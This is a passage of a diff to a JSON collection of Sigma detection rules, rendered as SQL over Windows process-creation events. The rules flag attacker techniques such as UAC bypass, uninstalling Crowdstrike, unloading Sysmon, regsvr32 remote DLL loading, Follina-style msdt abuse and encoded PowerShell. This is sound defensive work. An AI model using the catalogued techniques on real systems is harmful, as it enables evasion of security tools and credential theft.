later.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_lolbin_pktmon.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", - "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "title": "XSL Script Processing", + "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "status": "test", + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. 
Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", + "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1220" ], "falsepositives": [ - "FQDNs that start with a number" + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", + "Msxsl.exe is not installed by default, so unlikely.", + "Static format arguments - https://petri.com/command-line-wmi-part-3" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (CommandLine LIKE '%/format%' ESCAPE '\\' OR CommandLine LIKE '%-format%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Format:List%' ESCAPE '\\' OR CommandLine LIKE '%Format:htable%' 
ESCAPE '\\' OR CommandLine LIKE '%Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%Format:table%' ESCAPE '\\' OR CommandLine LIKE '%Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%Format:value%' ESCAPE '\\' OR CommandLine LIKE '%Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%Format:csv%' ESCAPE '\\'))) OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_wmic_xsl_script_processing.yml" }, { - "title": "Potential SPN Enumeration Via Setspn.EXE", - "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "status": "test", - "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", - "author": "Markus Neis, keepwatch", + "title": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell", + "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "status": "stable", + "description": "Detects Powershell as a child of the WmiPrvSE process. 
Which could be a sign of lateral movement via WMI.", + "author": "Markus Neis @Karneades", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.execution", + "attack.t1047", + "attack.t1059.001" ], "falsepositives": [ - "Administration activity" + "AppvClient", + "CCM", + "WinRM" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "proc_creation_win_setspn_spn_enumeration.yml" + "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" }, { - "title": "Ruby Inline Command Execution", - "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", - "status": "experimental", - "description": "Detects execution of ruby using the \"-e\" flag. 
This is could be used as a way to launch a reverse shell or execute live ruby code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Reg Add Open Command", + "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "status": "test", + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ruby_inline_command_execution.yml" + "filename": "proc_creation_win_reg_open_command.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", + "id": "eee00933-a761-4cd0-be70-c42fe91731e7", + "status": "test", + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1047" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1562.001" ], 
"falsepositives": [ - "Unlikely" + "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "File Download Using ProtocolHandler.exe", - "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", + "title": "Windows Admin Share Mount Via Net.EXE", + "id": "3abd6094-7027-475f-9630-8ab9be7b9725", + "status": "test", + "description": "Detects when an admin share is mounted using net.exe", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "falsepositives": [ + "Administrators" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_net_use_mount_admin_share.yml" + }, + { + "title": "Suspicious New Instance Of An Office COM Object", + "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", "status": "experimental", - "description": "Detects usage of \"ProtocolHandler\" to download files. 
Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", - "author": "frack113", + "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of office automation via scripting" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" + "filename": "proc_creation_win_office_svchost_parent.yml" }, { - "title": "Arbitrary Command Execution Using WSL", - "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", 
"status": "test", - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Automation and orchestration scripts may use this method to execute scripts etc.", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_susp_wsl.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Suspicious Execution of Powershell with Base64", - "id": "fb843269-508c-4b76-8b8d-88679db22ce7", - "status": "experimental", - "description": "Commandline to launch powershell with a 
base64 payload", - "author": "frack113", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ "attack.execution", "attack.t1059.001" 
@@ -22905,1714 +22911,1748 @@ "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE 
'%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + }, + { + "title": "PUA - WebBrowserPassView Execution", + "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "status": "experimental", + "description": "Detects the execution of WebBrowserPassView.exe. 
A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ], + "falsepositives": [ + "Legitimate use" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Web Browser Password Viewer' OR NewProcessName LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_encode.yml" + "filename": "proc_creation_win_pua_webbrowserpassview.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", - "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "status": "experimental", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ 
"attack.defense_evasion", - "attack.t1218.010" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", + "title": "Application Whitelisting Bypass via Bginfo", + "id": "aaf46cdc-934e-4284-b329-34aa701e3771", "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "author": "Beyu Denis, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.005", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR 
CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution 
